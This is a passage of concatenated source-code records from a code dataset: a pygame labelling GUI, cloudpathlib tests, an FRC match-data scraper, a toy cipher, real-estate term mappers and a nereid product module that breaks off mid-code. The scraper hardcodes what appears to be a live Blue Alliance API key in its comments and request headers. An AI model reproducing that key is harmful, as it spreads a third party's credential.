== pygame.K_0):\n label1[key_index] = 0\n text_render(surface, surface,label1, label2, todraw)\n for i in range(0,len(todraw)):\n pygame.draw.circle(surface, clr1, (todraw[i]), int(rad[i]),bor_size) \n pygame.draw.circle(surface, clr3, (todraw[key_index]), int(rad[key_index]),bor_size)\n screen.blit(surface, (0,0))\n pygame.display.update()\n elif (event.key == pygame.K_1):\n label1[key_index] = 0\n text_render(surface, surface,label1, label2, todraw)\n for i in range(0,len(todraw)):\n pygame.draw.circle(surface, clr1, (todraw[i]), int(rad[i]),bor_size)\n pygame.draw.circle(surface, clr3, (todraw[key_index]), int(rad[key_index]),bor_size)\n screen.blit(surface, (0,0))\n pygame.display.update()\n elif (event.key == pygame.K_2):\n label1[key_index] = 1\n text_render(surface, surface,label1, label2, todraw)\n for i in range(0,len(todraw)):\n pygame.draw.circle(surface, clr1, (todraw[i]), int(rad[i]),bor_size) \n pygame.draw.circle(surface, clr3, (todraw[key_index]), int(rad[key_index]),bor_size)\n screen.blit(surface, (0,0))\n pygame.display.update()\n elif (event.key == pygame.K_3):\n label1[key_index] = 2\n text_render(surface, surface,label1, label2, todraw)\n for i in range(0,len(todraw)):\n pygame.draw.circle(surface, clr1, (todraw[i]), int(rad[i]),bor_size)\n pygame.draw.circle(surface, clr3, (todraw[key_index]), int(rad[key_index]),bor_size)\n screen.blit(surface, (0,0))\n pygame.display.update()\n elif (event.key == pygame.K_4):\n label1[key_index] = 3\n text_render(surface, surface,label1, label2, todraw)\n for i in range(0,len(todraw)):\n pygame.draw.circle(surface, clr1, (todraw[i]), int(rad[i]),bor_size)\n\n pygame.draw.circle(surface, clr3, (todraw[key_index]), int(rad[key_index]),bor_size)\n screen.blit(surface, (0,0))\n pygame.display.update()\n elif (event.key == pygame.K_5):\n label1[key_index] = 4\n text_render(surface, surface,label1, label2, todraw)\n for i in range(0,len(todraw)):\n pygame.draw.circle(surface, clr1, (todraw[i]), int(rad[i]),bor_size)\n pygame.draw.circle(surface, clr3, (todraw[key_index]), int(rad[key_index]),bor_size)\n screen.blit(surface, (0,0))\n pygame.display.update()\n elif (event.key == pygame.K_6):\n label1[key_index] = 5\n text_render(surface, surface,label1, label2, todraw)\n for i in range(0,len(todraw)):\n pygame.draw.circle(surface, clr1, (todraw[i]), int(rad[i]),bor_size)\n pygame.draw.circle(surface, clr3, (todraw[key_index]), int(rad[key_index]),bor_size)\n screen.blit(surface, (0,0))\n pygame.display.update()\n elif (event.key == pygame.K_h):\n label2[key_index] = 72\n text_render(surface, surface,label1, label2, todraw)\n for i in range(0,len(todraw)):\n pygame.draw.circle(surface, clr1, (todraw[i]), int(rad[i]),bor_size)\n pygame.draw.circle(surface, clr3, (todraw[key_index]), int(rad[key_index]),bor_size)\n screen.blit(surface, (0,0))\n pygame.display.update()\n elif (event.key == pygame.K_t):\n label2[key_index] = 84\n text_render(surface, surface, label1, label2, todraw)\n for i in range(0,len(todraw)):\n pygame.draw.circle(surface, clr1, (todraw[i]), int(rad[i]),bor_size)\n pygame.draw.circle(surface, clr3, (todraw[key_index]), int(rad[key_index]),bor_size)\n screen.blit(surface, (0,0))\n pygame.display.update()\n pygame.display.update()\n elif event.type == pygame.KEYUP:\n if (event.key == pygame.K_g):\n text_render(surface, surface, label1, label2, todraw)\n for i in range(0,len(todraw)):\n pygame.draw.circle(surface, clr1, (todraw[i]), int(rad[i]),bor_size)\n pygame.draw.circle(surface, clr3, (todraw[key_index]), int(rad[key_index]),bor_size)\n screen.blit(surface, (0,0))\n pygame.display.update() \n return pos, todraw, rad, redo, redorad, index, prevind, txt, save_index, key_index, label1, label2\n\n\ndef folder_img(dir, txt):\n pictures = sorted(os.listdir(dir))\n txtfiles = [] #sorted(os.listdir(txtfolder)) \n pic = []\n txt2 = []\n txt3 = []\n # test = [elem[:-3] for elem in pictures]\n test = [elem[:-3] for elem in txtfiles]\n for picture in pictures:\n if picture[-3:] == \"jpg\" or picture[-3:] == \"png\" or picture[-3:] == \"peg\":\n pic.append(picture)\n test_jpg = [elem[:-3] for elem in pic]\n test_jpeg = [elem[:-4] for elem in pic]\n for pic2 in pic:\n if (pic2[:-4] not in test) and (pic2[-3:] == \"jpg\" or pic2[-3:] == \"png\"):\n txtfiles.append(f\"{pic2[:-4]}.txt\")\n elif pic2[:-5] not in test:\n txtfiles.append(f\"{pic2[:-5]}.txt\")\n txtfiles = sorted(txtfiles)\n for txtf in txtfiles:\n if txtf[-4:] == \".csv\" or txtf[-4:] == \".txt\":\n txt2.append(txtf)\n # print(txt2)\n for t in txt2:\n if t[:-3] in test_jpg or t[:-3] in test_jpeg:\n txt3.append(t)\n #tixt3 = sorted(txt3)\n print(f\" The images you have in the directory are {pic}\")\n print(f\" The txt files you have in the directory are {txt3}\")\n return pic, txt3\n","sub_path":"Classifier-GUI/src/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":9485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"518929647","text":"from datetime import datetime\nimport os\nfrom pathlib import PurePosixPath\nfrom time import sleep\n\nimport pytest\n\nfrom cloudpathlib.exceptions import CloudPathIsADirectoryError, DirectoryNotEmptyError\n\n\ndef test_file_discovery(rig):\n p = rig.create_cloud_path(\"dir_0/file0_0.txt\")\n assert p.exists()\n\n p2 = rig.create_cloud_path(\"dir_0/not_a_file\")\n assert not p2.exists()\n p2.touch()\n assert p2.exists()\n p2.unlink()\n\n p3 = rig.create_cloud_path(\"dir_0/\")\n assert p3.exists()\n assert len(list(p3.iterdir())) == 3\n assert len(list(p3.glob(\"**/*\"))) == 3\n\n with pytest.raises(CloudPathIsADirectoryError):\n p3.unlink()\n\n with pytest.raises(DirectoryNotEmptyError):\n p3.rmdir()\n p3.rmtree()\n assert not p3.exists()\n\n p4 = rig.create_cloud_path(\"\")\n assert p4.exists()\n\n assert len(list(p4.iterdir())) == 1 # only bucket/dir_1/ should still exist\n assert len(list(p4.glob(\"**/*\"))) == 4\n\n assert list(p4.glob(\"**/*\")) == list(p4.rglob(\"*\"))\n\n\ndef test_file_read_writes(rig, tmp_path):\n p = rig.create_cloud_path(\"dir_0/file0_0.txt\")\n p2 = rig.create_cloud_path(\"dir_0/not_a_file\")\n p3 = rig.create_cloud_path(\"\")\n\n text = \"lalala\" * 10_000\n\n p.write_text(text)\n assert p.read_text() == text\n p2.write_text(text)\n\n # sleep between writes to p to ensure different\n # modified times\n sleep(1)\n\n p.write_bytes(p2.read_bytes())\n assert p.read_text() == p2.read_text()\n\n before_touch = datetime.now()\n sleep(1)\n p.touch()\n if not getattr(rig, \"is_custom_s3\", False):\n # Our S3Path.touch implementation does not update mod time for MinIO\n assert datetime.fromtimestamp(p.stat().st_mtime) > before_touch\n\n # no-op\n p.mkdir()\n\n assert p.etag is not None\n\n dest = rig.create_cloud_path(\"dir2/new_file0_0.txt\")\n assert not dest.exists()\n p.rename(dest)\n assert dest.exists()\n\n assert not p.exists()\n p.touch()\n dest.replace(p)\n assert p.exists()\n\n dl_file = tmp_path / \"file\"\n p.download_to(dl_file)\n assert dl_file.exists()\n assert p.read_text() == dl_file.read_text()\n\n dl_dir = tmp_path / \"directory\"\n dl_dir.mkdir(parents=True, exist_ok=True)\n p3.download_to(dl_dir)\n cloud_rel_paths = sorted(\n # CloudPath(\"prefix://drive/dir/file.txt\")._no_prefix_no_drive = \"/dir/file.txt\"\n [p._no_prefix_no_drive[len(rig.test_dir) + 2 :] for p in p3.glob(\"**/*\")]\n )\n dled_rel_paths = sorted(\n [str(PurePosixPath(p.relative_to(dl_dir))) for p in dl_dir.glob(\"**/*\")]\n )\n assert cloud_rel_paths == dled_rel_paths\n\n\ndef test_cloud_path_download_to(rig, tmp_path):\n p = rig.create_cloud_path(\"dir_0/file0_0.txt\")\n dl_dir = tmp_path\n assert not (dl_dir / p.name).exists()\n p.download_to(dl_dir)\n assert (dl_dir / p.name).is_file()\n\n\ndef test_fspath(rig):\n p = rig.create_cloud_path(\"dir_0\")\n assert os.fspath(p) == p.fspath\n\n\ndef test_os_open(rig):\n p = rig.create_cloud_path(\"dir_0/file0_0.txt\")\n with open(p, \"r\") as f:\n assert f.readable()\n","sub_path":"tests/test_cloudpath_file_io.py","file_name":"test_cloudpath_file_io.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"308219973","text":"import xlwt\nimport requests\n\n# Useful links for me\n # https://www.thebluealliance.com/api/v3/events/2019/keys?X-TBA-Auth-Key=4lrD467ePfemtjf19Wga60f2xKg0yDn4qVvDjLByw12EbwQ8jDgJhO5zFX1m7qgG\n # Link to all of the keys for this year\n # https://www.thebluealliance.com/api/v3/events/2019?X-TBA-Auth-Key=4lrD467ePfemtjf19Wga60f2xKg0yDn4qVvDjLByw12EbwQ8jDgJhO5zFX1m7qgG\n # Link to all of the events for this year (more useful)\n\n# TODO\n # Fix headings\n\n''' READ: THIS FILE IS ONLY TO BE USED IF YOU MANUALLY WANT TO CONFIRM THE CARGO AND PANEL TOTALS FROM SCRIPT.PY'''\n\n################################## FOR NIKHIL AND TEJAS TO EDIT ###########################################\n\n''' Enter match key and what you want the file name to be. \n READ: The match keys for the Southfield Competition and the Marysville Competition are, respectively, \n 2019misou and 2019mimar. The key for the Week 0 competition is 2019week0 (if you need this for some reason). \n Put the correct key in for each competition. If the keys somehow don't work (yikes) visit the second link in\n the top of the program and use the filter bar in the top right of the website. '''\n\nmatch_key = \"2019misou\"\nfile_name = \"Week0_DeepSpace\"\n\n\n''' READ: If using Chrome put Chrome/72.0.3626.109 instead of Mozilla/5.0 between the quotes next to user-agent.\n Not sure if this really matters but do it just in case. Now that I think about it this really shouldn't matter\n at all but whatever. '''\n\nheaders = {\"X-TBA-Auth-Key\": \"4lrD467ePfemtjf19Wga60f2xKg0yDn4qVvDjLByw12EbwQ8jDgJhO5zFX1m7qgG\",\n \"User-agent\": \"Mozilla/5.0\"}\n\n############################################################################################################\n\n\nurl = \"https://www.thebluealliance.com/api/v3/\"\n\nr = requests.get(\"https://www.thebluealliance.com/api/v3/event/\" + match_key + \"/matches\", headers=headers).json()\n\nfile = xlwt.Workbook()\nred = file.add_sheet(\"Red Alliance\")\nblue = file.add_sheet(\"Blue Alliance\")\n\nsheets = (red, blue)\nteams = (\"red\", \"blue\")\n\n# Write data to file\ntry:\n raw_data_file = open(\"rawdata.json\", \"w\")\n\n for entry in r:\n raw_data_file.write(str(entry))\n raw_data_file.write(\"\\n \\n\")\n\nexcept IOError:\n print(\"WARNING: IOError\")\n pass\n\nlabels = (\"General\", \"Sandstorm\", \"Teleop\", \"Endgame\", \"Ranking Points\")\n\nlabels2 = (\"Record #\", \"Robots\", \"Starting Spot\", \"SStorm Action\",\n\n \"Bonus Points\", \"Total Auto Pts\",\n\n # T = Top, M = Middle, B = Bottom, L = Left, R = Right, N = Near, F = Far\n \"TL N Rocket\", \"TR N Rocket\", \"ML N Rocket\", \"MR N Rocket\", \"BL N Rocket\", \"BR N Rocket\",\n \"N Rocket Complete\",\n\n \"TL F Rocket\", \"TR F Rocket\", \"ML F Rocket\", \"MR F Rocket\", \"BL F Rocket\", \"BR F Rocket\",\n \"F Rocket Complete\",\n\n \"Pre-Storm Bay 1\", \"Pre-Storm Bay 2\", \"Pre-Storm Bay 3\", \"Pre-Storm Bay 6\",\n \"Pre-Storm Bay 7\", \"Pre-Storm Bay 8\",\n\n \"Bay 1\", \"Bay 2\", \"Bay 3\", \"Bay 4\", \"Bay 5\", \"Bay 6\", \"Bay 7\", \"Bay 8\",\n\n \"Hatch Points\", \"Cargo Points\", \"Endgame Action\", \"Total HAB Points\",\n \"Total Teleop Points\", \"Adjust Points\",\n\n \"Completed Rocket RP\", \"HAB RP\",\n\n \"Foul Count\", \"Tech Foul Count\", \"Foul Points Earned\",\n\n \"Total Points\", \"Win/Lose\", \"Total RP\")\n\n# Add labels in first row\nfor s in sheets:\n s.write(0, 0, \"General\")\n s.write(0, 2, \"Sandstorm\")\n s.write(0, 6, \"Teleop\")\n s.write(0, 20, \"Endgame/Totals\")\n s.write(0, 25, \"Ranking Points\")\n\n# Add match numbers\nrow = 0\n\nfor match in range(len(r)):\n for s in sheets:\n s.write(row + 2, 0, match + 1)\n row += 3\n\n# Add labels in second row\nfor label in range(len(labels2)):\n for s in sheets:\n s.write(1, label, labels2[label])\n\n# Fill in data\ncurrent_row = 2\n\nfor match in range(len(r)):\n try:\n for team in range(2):\n sheet = sheets[team]\n\n # Add team numbers\n for team_key in range(3):\n data = r[match][\"alliances\"][teams[team]][\"team_keys\"][team_key]\n sheet.write(current_row + team_key, 1, int(data.replace(\"frc\", \"\")))\n\n data = r[match][\"score_breakdown\"][teams[team]]\n\n # Starting level of robot\n for robot in range(3):\n temp = data[\"preMatchLevelRobot\" + str(robot+1)]\n sheet.write(current_row + robot, 2, temp)\n\n # Sandstorm action of each robot\n for robot in range(3):\n\n temp = data[\"habLineRobot\" + str(robot+1)]\n\n if temp == \"CrossedHabLineInSandstorm\":\n temp = \"CrossedHabInStorm\"\n\n elif temp == \"CrossedHabLineInTeleop\":\n temp = \"CrossedHabInTeleop\"\n\n sheet.write(current_row + robot, 3, temp)\n\n # Sandstorm bonus and total\n sheet.write(current_row, 4, data[\"sandStormBonusPoints\"])\n sheet.write(current_row, 5, data[\"autoPoints\"])\n\n # Near Rocket\n sheet.write(current_row, 6, data[\"lowLeftRocketNear\"])\n sheet.write(current_row, 7, data[\"lowRightRocketNear\"])\n sheet.write(current_row, 8, data[\"midLeftRocketNear\"])\n sheet.write(current_row, 9, data[\"midRightRocketNear\"])\n sheet.write(current_row, 10, data[\"topLeftRocketNear\"])\n sheet.write(current_row, 11, data[\"topRightRocketNear\"])\n\n temp = str(data[\"completedRocketNear\"])\n\n if temp == \"False\":\n temp = \"No\"\n elif temp == \"True\":\n temp = \"Yes\"\n\n sheet.write(current_row, 12, temp)\n\n # Far Rocket\n sheet.write(current_row, 13, data[\"lowLeftRocketFar\"])\n sheet.write(current_row, 14, data[\"lowRightRocketFar\"])\n sheet.write(current_row, 15, data[\"midLeftRocketFar\"])\n sheet.write(current_row, 16, data[\"midRightRocketFar\"])\n sheet.write(current_row, 17, data[\"topLeftRocketFar\"])\n sheet.write(current_row, 18, data[\"topRightRocketFar\"])\n\n temp = str(data[\"completedRocketFar\"])\n\n if temp == \"False\":\n temp = \"No\"\n elif temp == \"True\":\n temp = \"Yes\"\n\n sheet.write(current_row, 19, temp)\n\n # Pre-Sandstorm Bays\n sheet.write(current_row, 20, data[\"preMatchBay1\"])\n sheet.write(current_row, 21, data[\"preMatchBay2\"])\n sheet.write(current_row, 22, data[\"preMatchBay3\"])\n sheet.write(current_row, 23, data[\"preMatchBay6\"])\n sheet.write(current_row, 24, data[\"preMatchBay7\"])\n sheet.write(current_row, 25, data[\"preMatchBay8\"])\n\n # After match bays\n for count in range(8):\n\n temp = data[\"bay\" + str(count+1)]\n\n if temp == \"PanelAndCargo\":\n temp = \"Both\"\n\n sheet.write(current_row, 26 + count, temp)\n\n # Hatch panel points\n sheet.write(current_row, 34, data[\"hatchPanelPoints\"])\n\n # Cargo points\n sheet.write(current_row, 35, data[\"cargoPoints\"])\n\n # Endgame action\n for robot in range(3):\n temp = data[\"endgameRobot\" + str(robot + 1)]\n sheet.write(current_row + robot, 36, temp)\n\n # Total HAB climbing points\n sheet.write(current_row, 37, data[\"habClimbPoints\"])\n\n # Total teleop points\n sheet.write(current_row, 38, data[\"teleopPoints\"])\n\n # Adjust points (remove later)\n sheet.write(current_row, 39, data[\"adjustPoints\"])\n\n # Completed rocket ranking point\n temp = str(data[\"completeRocketRankingPoint\"])\n\n if temp == \"False\":\n temp = 0\n elif temp == \"True\":\n temp = 1\n\n sheet.write(current_row, 40, temp)\n\n # HAB docking ranking point\n temp = str(data[\"habDockingRankingPoint\"])\n\n if temp == \"False\":\n temp = 0\n elif temp == \"True\":\n temp = 1\n\n sheet.write(current_row, 41, temp)\n\n # Fouls\n sheet.write(current_row, 42, data[\"foulCount\"])\n sheet.write(current_row, 43, data[\"techFoulCount\"])\n sheet.write(current_row, 44, data[\"foulPoints\"])\n\n # Total points\n sheet.write(current_row, 45, data[\"totalPoints\"])\n\n # Win or lose (potential source for error due to if-else?)\n temp = str(r[match][\"winning_alliance\"])\n\n if temp == teams[team]:\n temp = \"Win\"\n else:\n temp = \"Loss\"\n\n sheet.write(current_row, 46, temp)\n\n # Total ranking points\n sheet.write(current_row, 47, data[\"rp\"])\n\n except TypeError:\n print(\"Ends at \" + str(match))\n\n current_row += 3\n\nfile.save(file_name + \".xls\")\n","sub_path":"2019 Deep Space /backup_script.py","file_name":"backup_script.py","file_ext":"py","file_size_in_byte":8991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"290595795","text":"#!/usr/bin/env python3\nfrom random import choice\n\ndef cifrar(texto, clave1, clave2):\n nuevo = ''\n lenclave1 = len(clave1)\n lenp2 = lenclave1//2\n for letraOriginal in range(len(texto)):\n letraReal = clave2[letraOriginal%len(clave2)]\n letrasRandom = clave1.replace(letraReal, '')+clave1.replace(letraReal, '').upper()\n for letraClave in range(lenp2):\n if clave1[letraClave] == texto[letraOriginal]:\n nuevo += letraReal\n elif clave1[letraClave+lenp2] == texto[letraOriginal]:\n nuevo += letraReal.upper()\n else:\n falsa = choice(letrasRandom)\n nuevo += falsa\n letrasRandom = letrasRandom.replace(falsa.lower(), '')\n letrasRandom = letrasRandom.replace(falsa.upper(), '')\n return nuevo\n\ndef descifrar(texto, clave1, clave2):\n lenclave1 = len(clave1)\n lenp2 = int(lenclave1/2)\n antiguo = ''\n for x in range(0, len(texto), lenp2):\n cifrada = texto[x: x+lenp2]\n caracter = clave2[int(x/lenp2)%len(clave2)]\n for y in range(lenp2):\n if caracter == cifrada[y]:\n antiguo += clave1[y]\n break\n elif caracter.upper() == cifrada[y]:\n antiguo += clave1[y+lenp2]\n break\n return antiguo\n\nif __name__ == '__main__':\n clave1 = 'qwertyuiopñlkjhgfdsazxcvbnm .,?!áéíóú/'\n clave2 = 'clavedosdeejemplo'\n CIFoDES = input('quieres cifrar o descifrar? ')\n \n if CIFoDES.startswith('o'):\n clave1 = input('clave1 = ')\n clave2 = input('clave2 = ')\n CIFoDES = input('quieres cifrar o descifrar? ')\n if CIFoDES.startswith('c'):\n print(cifrar(input(''), clave1, clave2))\n elif CIFoDES.startswith('d'):\n print(descifrar(input(''), clave1, clave2))\n\n","sub_path":"test/codigo.py","file_name":"codigo.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"228299200","text":"def get_month(x):\n month = {\n 'января': 1,\n 'февраля': 2,\n 'марта': 3,\n 'апреля': 4,\n 'мая': 5,\n 'июня': 6,\n 'июля': 7,\n 'августа': 8,\n 'сентября': 9,\n 'октября': 10,\n 'ноября': 11,\n 'декабря': 12,\n }\n\n return month.get(x.lower(), None)\n\n\ndef get_OTC(x):\n offerTypeCode = {\n 'продам': 'sale',\n 'сдам': 'rent',\n 'посуточно': 'short',\n 'продажа': 'sale',\n 'аренда': 'rent',\n 'квартиры': 'short'\n }\n\n return offerTypeCode.get(x.lower(), None)\n\n\ndef get_CC(x):\n categoryCode = {\n 'жилая': 'REZIDENTIAL',\n 'коммерческая': 'COMMERSIAL',\n 'участкиидачи': 'LAND',\n\n 'квартиры': 'REZIDENTIAL',\n 'посуточная аренда квартир': 'REZIDENTIAL',\n 'комнаты': 'REZIDENTIAL',\n 'коммерческая недвижимость': 'COMMERSIAL',\n 'дома': 'REZIDENTIAL',\n 'дачи': 'LAND',\n 'коттеджи': 'LAND',\n 'посуточная аренда домов': 'REZIDENTIAL',\n 'земельные участки': 'LAND',\n\n 'квартир': 'REZIDENTIAL',\n 'дом': 'REZIDENTIAL',\n 'коттедж': 'LAND',\n 'посуточно': 'REZIDENTIAL',\n 'помещений': 'COMMERSIAL',\n 'земельных': 'LAND',\n 'дач': 'LAND',\n }\n\n return categoryCode.get(x.lower(), None)\n\n\ndef get_BT(x):\n buildingType = {\n 'elite': 'multisection_house',\n 'business': 'multisection_house',\n 'econom': 'multisection_house',\n 'improved': 'multisection_house',\n 'brezhnev': 'multisection_house',\n 'khrushchev': 'multisection_house',\n 'stalin': 'multisection_house',\n 'old_fund': 'multisection_house',\n\n 'small_apartm': 'corridor_house',\n 'dormitory': 'corridor_house',\n 'gostinka': 'corridor_house',\n\n 'individual': 'galary_house',\n\n 'single_house': 'lowrise_house',\n 'cottage': 'lowrise_house',\n 'townhouse': 'lowrise_house',\n 'duplex': 'lowrise_house',\n\n 'IZS!!!': 'settlements_land',\n 'dacha': 'agricultural_land',\n\n 'помещение свободного назначения': 'gpurpose_place',\n 'торговое помещение': 'market_place',\n 'производственное помещение': 'production_place',\n 'здание': 'other',\n 'база': 'production_place',\n 'складское помещение': 'production_place',\n 'офисное помещение': 'office',\n\n\n 'hotel': 'gpurpose_place',\n 'restaurant': 'gpurpose_place',\n 'cafe': 'gpurpose_place',\n 'sport_building': 'gpurpose_place',\n\n 'shop': 'market_place',\n 'shops_center': 'market_place',\n 'shop_entertainment': 'market_place',\n\n 'cabinet': 'office',\n 'office_space': 'office',\n 'office_building': 'office',\n 'business_center': 'office',\n\n 'manufacture_building': 'production_place',\n 'warehouse_space': 'production_place',\n 'industrial_enterprise': 'production_place',\n }\n\n return buildingType.get(x.lower(), None)\n\n\ndef get_BC(x):\n buildingClass = {\n 'элиткласс': 'elite',\n 'бизнескласс': 'business',\n 'экономкласс': 'econom',\n 'улучшенная': 'improved',\n 'новая': 'improved',\n 'брежневка': 'brezhnev',\n 'хрущевка': 'khrushchev',\n 'сталинка': 'stalin',\n 'старыйфонд': 'old_fund',\n 'малосемейки': 'small_apartm',\n 'малосемейка': 'small_apartm',\n 'общежитие': 'dormitory',\n 'гостинка': 'gostinka',\n 'индивидуальная': 'individual',\n 'дом': 'single_house',\n 'дома': 'single_house',\n 'коттедж': 'cottage',\n 'дача': 'dacha',\n 'дачи': 'dacha',\n 'ИЖС': 'IZS!!!',\n 'таунхаус': 'townhouse',\n 'дуплекс': 'duplex',\n 'а+': 'A+'\n }\n\n return buildingClass.get(x.lower(), None)\n\n\ndef get_TC(x):\n typeCode = {\n 'доля': 'share',\n 'комната': 'room',\n 'комнаты': 'room',\n 'квартира': 'apartment',\n 'квартиры': 'apartment',\n 'дом': 'house',\n 'коттедж': 'cottage',\n 'дача': 'dacha',\n 'дачи': 'dacha',\n 'таунхаус': 'townhouse',\n 'дуплекс': 'duplex',\n 'дачныйземельныйучасток': 'dacha_land',\n\n 'помещение свободного назначения': 'gpurpose_place',\n 'торговое помещение': 'shop',\n 'производственное помещение': 'manufacture_building',\n 'здание': 'other',\n 'база': 'manufacture_building',\n 'складское помещение': 'warehouse_space',\n 'офисное помещение': 'office_space'\n }\n\n return typeCode.get(x.lower(), None)\n","sub_path":"old version/production/rplus_import2/python-server/parsers/special_function.py","file_name":"special_function.py","file_ext":"py","file_size_in_byte":5402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"366888515","text":"# -*- coding: utf-8 -*-\nfrom collections import deque\n\nfrom nereid import render_template, route\nfrom nereid.globals import session, request, current_app\nfrom nereid.helpers import slugify, url_for\nfrom nereid import jsonify, Markup, current_locale\nfrom nereid.contrib.pagination import Pagination\nfrom nereid.contrib.sitemap import SitemapIndex, SitemapSection\nfrom werkzeug.exceptions import NotFound\nfrom flask.ext.babel import format_currency\n\nfrom trytond.model import ModelSQL, ModelView, fields\nfrom trytond.pyson import Eval, Not, Bool\nfrom trytond.pool import Pool, PoolMeta\nfrom sql import Null\n\n__all__ = [\n 'Product', 'ProductsRelated', 'ProductTemplate',\n 'ProductMedia', 'ProductCategory'\n]\n\nDEFAULT_STATE = {'invisible': Not(Bool(Eval('displayed_on_eshop')))}\nDEFAULT_STATE2 = {\n 'invisible': Not(Bool(Eval('displayed_on_eshop'))),\n 'required': Bool(Eval('displayed_on_eshop')),\n}\n\n\nclass ProductMedia(ModelSQL, ModelView):\n \"Product Media\"\n __name__ = \"product.media\"\n\n sequence = fields.Integer(\"Sequence\", required=True, select=True)\n static_file = fields.Many2One(\n \"nereid.static.file\", \"Static File\", required=True, select=True)\n product = fields.Many2One(\"product.product\", \"Product\", select=True)\n template = fields.Many2One(\"product.template\", \"Template\", select=True)\n url = fields.Function(fields.Char(\"URL\"), \"get_url\")\n\n def get_url(self, name):\n return self.static_file.url\n\n @classmethod\n def __setup__(cls):\n super(ProductMedia, cls).__setup__()\n\n cls._order.insert(0, ('sequence', 'ASC'))\n\n @staticmethod\n def default_sequence():\n return 10\n\n\nclass ProductTemplate:\n __metaclass__ = PoolMeta\n __name__ = \"product.template\"\n\n products_displayed_on_eshop = fields.Function(\n fields.One2Many('product.product', None, 'Products (Disp. on eShop)'),\n 'get_products_displayed_on_eshop'\n )\n\n long_description = fields.Text('Long Description')\n\n description = fields.Text(\"Description\")\n media = fields.One2Many(\"product.media\", \"template\", \"Media\")\n images = fields.Function(\n fields.One2Many('nereid.static.file', None, 'Images'),\n getter='get_template_images'\n )\n\n def get_template_images(self, name=None):\n \"\"\"\n Getter for `images` function field\n \"\"\"\n template_images = []\n for media in self.media:\n if media.static_file.mimetype and \\\n 'image' in media.static_file.mimetype:\n template_images.append(media.static_file.id)\n return template_images\n\n def get_products_displayed_on_eshop(self, name=None):\n \"\"\"\n Return the variants that are displayed on eshop\n \"\"\"\n Product = Pool().get('product.product')\n\n return map(\n int,\n Product.search([\n ('template', '=', self.id),\n ('displayed_on_eshop', '=', True),\n ])\n )\n\n\nclass Product:\n \"Product extension for Nereid\"\n __metaclass__ = PoolMeta\n __name__ = \"product.product\"\n\n #: Decides the number of products that would be remebered.\n recent_list_size = 5\n\n #: The list of fields allowed to be sent back on a JSON response from the\n #: application. This is validated before any product info is built\n #:\n #: The `name`, `sale_price`, `id` and `uri` are sent by default\n #:\n #: .. versionadded:: 0.3\n json_allowed_fields = set(['rec_name', 'sale_price', 'id', 'uri'])\n\n uri = fields.Char(\n 'URI', select=True, states=DEFAULT_STATE2\n )\n\n displayed_on_eshop = fields.Boolean('Displayed on E-Shop?', select=True)\n long_description = fields.Text('Long Description')\n media = fields.One2Many(\"product.media\", \"product\", \"Media\")\n images = fields.Function(\n fields.One2Many('nereid.static.file', None, 'Images'),\n getter='get_product_images'\n )\n up_sells = fields.Many2Many(\n 'product.product-product.product',\n 'product', 'up_sell', 'Up-Sells', states=DEFAULT_STATE\n )\n cross_sells = fields.Many2Many(\n 'product.product-product.product',\n 'product', 'cross_sell', 'Cross-Sells', states=DEFAULT_STATE\n )\n default_image = fields.Function(\n fields.Many2One('nereid.static.file', 'Image'), 'get_default_image',\n )\n use_template_description = fields.Boolean(\"Use template's description\")\n\n @classmethod\n def view_attributes(cls):\n return super(Product, cls).view_attributes() + [\n ('//page[@id=\"desc\"]', 'states', {\n 'invisible': Bool(Eval('use_template_description'))\n }), ('//page[@id=\"ecomm_det\"]', 'states', {\n 'invisible': Not(Bool(Eval('displayed_on_eshop')))\n }), ('//page[@id=\"related_products\"]', 'states', {\n 'invisible': Not(Bool(Eval('displayed_on_eshop')))\n })]\n\n @classmethod\n def copy(cls, products, default=None):\n \"\"\"Duplicate products\n \"\"\"\n if default is None:\n default = {}\n default = default.copy()\n default['displayed_on_eshop'] = False\n\n duplicate_products = []\n for index, product in enumerate(products, start=1):\n if product.uri:\n default['uri'] = \"%s-copy-%d\" % (product.uri, index)\n\n duplicate_products.extend(\n super(Product, cls).copy([product], default)\n )\n\n return duplicate_products\n\n @classmethod\n def validate(cls, products):\n super(Product, cls).validate(products)\n cls.check_uri_uniqueness(products)\n\n @classmethod\n def get_default_image(cls, products, name):\n \"\"\"\n Returns default product image if any.\n \"\"\"\n res = {}\n for product in products:\n images = product.images or product.template.images\n res[product.id] = images[0].id if images else None\n return res\n\n @classmethod\n def __setup__(cls):\n super(Product, cls).__setup__()\n cls.description.states['invisible'] = Bool(\n Eval('use_template_description')\n )\n cls._error_messages.update({\n 'unique_uri': ('URI of Product must be Unique'),\n })\n cls.per_page = 12\n\n @staticmethod\n def default_displayed_on_eshop():\n return False\n\n @fields.depends('template', 'uri')\n def on_change_with_uri(self):\n \"\"\"\n If the URI is empty, slugify template name into URI\n \"\"\"\n if not self.uri and self.template:\n return slugify(self.template.name)\n return self.uri\n\n @staticmethod\n def default_use_template_description():\n return True\n\n @classmethod\n def check_uri_uniqueness(cls, products):\n \"\"\"\n Ensure uniqueness of products uri.\n \"\"\"\n query = ['OR']\n for product in products:\n # Do not check for unique uri if product is marked as\n # not displayed on eshop\n if not product.displayed_on_eshop:\n continue\n\n arg = [\n 'AND', [\n ('id', '!=', product.id)\n ], [\n ('uri', 'ilike', product.uri)\n ]\n ]\n query.append(arg)\n if query != ['OR'] and cls.search(query):\n cls.raise_user_error('unique_uri')\n\n @classmethod\n @route('/product/')\n @route('/product//')\n def render(cls, uri, path=None):\n \"\"\"Renders the template for a single product.\n\n :param uri: URI of the product\n :param path: Ignored parameter. This is used in\n cases where SEO friendly URL like\n product/category/sub-cat/sub-sub-cat/product-uri\n are generated\n \"\"\"\n products = cls.search([\n ('displayed_on_eshop', '=', True),\n ('uri', '=', uri),\n ('template.active', '=', True),\n ], limit=1)\n if not products:\n return NotFound('Product Not Found')\n\n cls._add_to_recent_list(int(products[0]))\n return render_template('product.jinja', product=products[0])\n\n @classmethod\n @route('/products/+recent', methods=['GET', 'POST'])\n def recent_products(cls):\n \"\"\"\n GET\n 